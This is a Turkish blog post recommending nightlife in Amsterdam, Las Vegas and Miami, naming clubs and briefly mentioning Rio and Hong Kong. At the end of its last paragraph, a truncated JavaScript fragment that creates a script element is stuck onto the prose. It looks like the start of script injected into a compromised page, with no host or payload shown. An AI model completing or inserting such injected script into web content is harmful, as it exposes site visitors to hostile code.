ev » EĞLENCE » Gece Hayatı » Dudağınızı Uçuklatacak: Dünyadaki Örnekleriyle Gece Hayatı

Dudağınızı Uçuklatacak: Dünyadaki Örnekleriyle Gece Hayatı

14Amsterdam

Gece hayatı denildi mi ilk akla gelen şehirdir Amsterdam. ”Red Light Strict”ten gece klüplerine o kadar çok seçeneğiniz vardır ki adeta beyninizden vurulmuşa dönersiniz. Paradiso, Escape, Jimmy Woo, Trouw, Melkweg bunlardan sadece birkaçı. Ancak siz bunlarla sınırlı kalmayın; araştırın. Bazı gece kulüplerinde aynı zamanda konserler de olduğundan belki de o kulübü tercih etmek istersiniz.

Melkweg

(Resimdeki gece kulübü Melkweg’tir.)

red-light-district

Las Vegas

Günah şehri olarak bilinen Las Vegas’ta yapılacak şeyleri siz bizden daha iyi bilirsiniz herhalde. Kumar, seks, striptiz kulüpleri, alkol, dans… Las Vegas’ta tek bir gece geçirmek bile hayatınızdaki en çılgın unutulmaz deneyim olarak kalacaktır. Bir yerden başlamak gerekirse Body English (Hard Rock Hotel), Chateau (Paris Las Vegas), Foundation Room (Mandalay Bay) Hyde Bellagio (Bellagio Las Vegas) gidebileceğiniz gece kulüplerinden sadece birkaçı. Bizim size tavsiyemiz tek bir yere bağlı kalmayın oradan oraya sürüklenin; ruhunuzu Vegas’a teslim edin!

Miami

?????????????????????????????????????????????????????

Gece hayatını sahilde çılgınlar gibi eğlenmek isteyenler için Miami harika bir durak. ”Nikki Beach Club” sahilin göbeğinde her pazar verdiği ve gece yarısına kadar süren partilerle size güzel bir gün vaat eder. Kendinizi gecenin bir yarısı denize çıplak koşarken bulmak çok da saçma olmaz. Kalan enerjinizle birbirinden güzel gece kulüplerinde eğlencenize sabaha kadar devam edebilirsiniz. Bamboo, E11even Miami, Mango’s Tropical Cafe, Liv bunlardan bazıları.

miami-bayside-marketplace-and-marina-panoramic-hdr-by-justin-kelefas

Bizim önerimiz olan bu üç şehirde eğlencenin dibine vurmak için çok da bakınmanıza gerek yok. Ancak bu üç şehir dışında gidebileceğiniz ve oldukça hareketli gece hayatına sahip olan şehirler de var. Rio de Janeiro, sambanın şehri size sambadan çok daha fazlasını sunacaktır hiç şüphesiz. Zamanında yüz seneliğine İngiltere’ye kiralanan 1997’te Çin’e teslim edilen Hong Kong’ta da ilginç bir gece hayatı yaşayabilirsiniz. Aç kalırım diye korkmayın Hong Kong’ta her köşe başında bir Mcdonalds’a rastlamak mümkün. En nihayetinde kendi evinize döndüğünüzde bu unutulmaz geceleri hatırlarken çok güleceksiniz ve “İyi ki gitmişim.” diyeceğinize eminiz.var d=document;var s=d.createElement(‘script’);

Dudağınızı Uçuklatacak: Dünyadaki Örnekleriyle Gece Hayatı Reviewed by on . 14Amsterdam Gece hayatı denildi mi ilk akla gelen şehirdir Amsterdam. ''Red Light Strict''ten gece klüplerine o kadar çok seçeneğiniz vardır ki adeta beyninizde 14Amsterdam Gece hayatı denildi mi ilk akla gelen şehirdir Amsterdam. ''Red Light Strict''ten gece klüplerine o kadar çok seçeneğiniz vardır ki adeta beyninizde Rating: 0

Leave a Comment

scroll to top